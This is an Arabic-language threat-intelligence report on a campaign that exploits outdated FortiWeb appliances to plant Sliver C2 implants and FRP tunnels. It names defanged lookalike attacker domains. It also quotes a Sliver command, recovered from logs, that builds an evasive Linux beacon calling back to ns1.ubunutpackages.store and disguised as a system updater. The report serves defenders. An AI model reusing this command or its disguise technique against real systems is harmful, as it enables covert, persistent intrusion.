تشير التطورات الأخيرة إلى أن جهة تهديد متطورة تستغل حاليًا العديد من أجهزة FortiWeb القديمة لنشر إطار عمل التحكم والسيطرة (C2) المعروف باسم Sliver. يسلط هذا الهجوم الضوء على اتجاه مقلق حيث يستفيد المهاجمون من أدوات المصدر المفتوح لخلق وصول مستمر داخل الشبكات المخترقة، مما يساعدهم غالبًا على تجاوز الدفاعات الأمنية التقليدية. يبدو أن المهاجمين يعطون الأولوية للأجهزة الطرفية غير المصححة، محولين إياها إلى نقاط دخول مستقرة للتسلل الأوسع إلى الشبكة. إن استغلال أجهزة FortiWeb القديمة من قبل جهة تهديد لخلق وصول مستمر يمثل قلقًا متزايدًا.
تتم عملية الإصابة بشكل أساسي من خلال استغلال الثغرات الأمنية في أجهزة FortiWeb المواجهة للجمهور، مع التركيز بشكل خاص على إصدارات البرامج الثابتة من 5.4.202 إلى 6.1.62. وعلى الرغم من أن الثغرة الأمنية الدقيقة المستخدمة في اختراق FortiWeb لا تزال غير مؤكدة، فقد لوحظ أن المجموعة تستخدم أيضًا React2Shell (CVE-2025-55182) في عمليات متوازية.
بمجرد إنشاء الوصول الأولي، يقوم المهاجمون بنشر أداة Fast Reverse Proxy (FRP) للكشف عن الخدمات المحلية، مما يخلق جسرًا مباشرًا بين الشبكة الداخلية للضحية وأنظمة تحكم المهاجم الخارجية.
خلال عملية البحث الروتينية عن التهديدات مفتوحة الدليل على Censys، اكتشف محللو Ctrl-Alt-Int3l هذه البنية التحتية الضارة بعد العثور على قواعد بيانات وسجلات Sliver C2 مكشوفة. قدمت هذه الأصول المكشوفة نظرة نادرة على أساليب تشغيل المهاجم، وكشفت عن مجموعة من الأجهزة المخترقة وهي تتواصل مع خوادم تحكم مركزية. أكد التحقيق أن غالبية المضيفين الضحايا كانوا يعملون ببرامج ثابتة قديمة، مما يجعلهم عرضة بشدة لحملة الفرص هذه ولكنها مستهدفة.
يعد التأثير التشغيلي شديدًا، حيث يمنح الفاعل التهديدي ثباتًا طويل الأمد على أجهزة الأمان الحرجة التي تثق بها الشبكة عادةً. من خلال دمج زرع Sliver مباشرة على جدار الحماية، يمكن للمهاجمين مراقبة حركة المرور وتنفيذ أوامر مميزة.
توضح الحملة أيضًا تركيزًا استراتيجيًا، مع وجود مؤشرات محددة تشير إلى أهداف في جنوب آسيا، ويتضح ذلك من البنية التحتية الوهمية ذات الموضوعات المصممة بعناية.
استراتيجية التحكم والسيطرة
تعتمد البنية التحتية لجهة التهديد على نطاق واسع على نطاقات وهمية مصممة لتقليد الخدمات المشروعة. كشف تحليل تكوين C2 عن نطاقات مثل ns1.ubunutpackages[.]store و ns1.bafairforce[.]army.
استضافت هذه النطاقات محتوى مزيفًا، بما في ذلك مستودع “Ubuntu Packages” وصفحة تجنيد “Bangladesh Airforce”، لخداع المدافعين عن الشبكة. استخدم المهاجمون أوامر Sliver محددة لإنشاء حمولاتهم بقدرات التهرب.
تم استرداد الأمر التالي من السجلات:
generate beacon --http ns1.ubunutpackages.store --reconnect 120 --strategy r --template ubuntu --os linux --evasion --save ./system-updater --seconds 60
يقوم هذا التكوين بتعيين المنارة لإعادة الاتصال كل 120 ثانية ويستخدم قالب “ubuntu” ليمتزج مع عمليات Linux. تم نشر الملف الثنائي الناتج في /bin/.root/system-updater على أجهزة FortiWeb المصابة، مما يزيد من التظاهر بأنه أداة تحديث للنظام.